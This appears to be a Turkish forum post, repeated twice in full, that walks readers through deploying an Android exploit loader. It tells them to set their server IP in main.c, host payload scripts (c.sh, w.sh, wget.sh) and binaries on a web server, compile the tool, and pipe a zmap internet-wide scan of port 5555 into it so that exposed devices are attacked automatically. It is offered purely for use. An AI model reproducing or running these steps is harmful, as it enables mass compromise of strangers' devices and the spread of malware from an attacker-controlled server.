naber beyler android exploit hala güzel bir şekilde çalışmakta.
yum install unzip -y
yum install screen -y
yum install epel-release -y
yum install zmap -y
yum install gcc gcc-c++ -y
kurulum sonrası değişiklik yapacağınız bölümler bulunmakta. derleme yapmadan önce src klasörüne giriş yapıyoruz. main.c açıyoruz. 211'ci satıra geliyoruz.

serverip yazan her yere server ipnizi yazıyorsunuz.
düzenleme sonrasında upload klasörünü açıyoruz.
bins dosyalarını bulmanız gerekmektedir. /var/www/html/ giriş yaparak bins'lerinizin yolunu öğrenin. ("BAZI GÜNCELLENMİŞ SÜRÜMLERİNDE BİNS KLASÖRÜ /bins /comp vb olabilir bunu /var/www/html/ girerek öğreniniz.")

Binslerin yolunu öğrendiğinizi varsıyorum. tekrar upload klasörüne geri dönüyoruz.
c.sh - w.sh - wget.sh dosyaları bizi karşılıyor.
burayı binslerinizin yoluna göre düzenliyorsunuz yani bu şekilde gözükmesi gerekiyor.

c.sh - w.sh - wget.sh dosyalarını hepsinde bu düzenlemeyi yapın.
düzenleme sonrasında "/var/www/html/" ana dizine yükleyin.
ana dizine yüklemezseniz çalışmaz payloadımız bu şekilde.
dosyayı ana dizinden çekmektedir.

düzenlemeler yapıldıktan sonra bütün klasörü içine atınız. upload'ı atmanıza gerek yok.
derleme için kullanacağımız komut "gcc src/*.c -o android -s -Os -lpthread"
derleme sonrasına android adında bir dosya oluşucaktır.
ulimit -n999999; ulimit -u999999; ulimit -e999999; zmap -p 5555 -o- -q -v0 -T3 | awk {'print $1":5555"'} | ./android
bu kodu kullanarak exploiti başlatabilirsiniz. zmap ile otomatik 5555 portu üzerinde tarama yaparak ipler üzerinde exploiti denemeye başlayacaktır.
ZMAP KURULU OLMAZSA ÇALIŞMAZ.
yum install unzip -y
yum install screen -y
yum install epel-release -y
yum install zmap -y
yum install gcc gcc-c++ -y
kurulum sonrası değişiklik yapacağınız bölümler bulunmakta. derleme yapmadan önce src klasörüne giriş yapıyoruz. main.c açıyoruz. 211'ci satıra geliyoruz.

serverip yazan her yere server ipnizi yazıyorsunuz.
düzenleme sonrasında upload klasörünü açıyoruz.
bins dosyalarını bulmanız gerekmektedir. /var/www/html/ giriş yaparak bins'lerinizin yolunu öğrenin. ("BAZI GÜNCELLENMİŞ SÜRÜMLERİNDE BİNS KLASÖRÜ /bins /comp vb olabilir bunu /var/www/html/ girerek öğreniniz.")

Binslerin yolunu öğrendiğinizi varsıyorum. tekrar upload klasörüne geri dönüyoruz.
c.sh - w.sh - wget.sh dosyaları bizi karşılıyor.
burayı binslerinizin yoluna göre düzenliyorsunuz yani bu şekilde gözükmesi gerekiyor.

c.sh - w.sh - wget.sh dosyalarını hepsinde bu düzenlemeyi yapın.
düzenleme sonrasında "/var/www/html/" ana dizine yükleyin.
ana dizine yüklemezseniz çalışmaz payloadımız bu şekilde.
dosyayı ana dizinden çekmektedir.

düzenlemeler yapıldıktan sonra bütün klasörü içine atınız. upload'ı atmanıza gerek yok.
derleme için kullanacağımız komut "gcc src/*.c -o android -s -Os -lpthread"
derleme sonrasına android adında bir dosya oluşucaktır.
ulimit -n999999; ulimit -u999999; ulimit -e999999; zmap -p 5555 -o- -q -v0 -T3 | awk {'print $1":5555"'} | ./android
bu kodu kullanarak exploiti başlatabilirsiniz. zmap ile otomatik 5555 portu üzerinde tarama yaparak ipler üzerinde exploiti denemeye başlayacaktır.
ZMAP KURULU OLMAZSA ÇALIŞMAZ.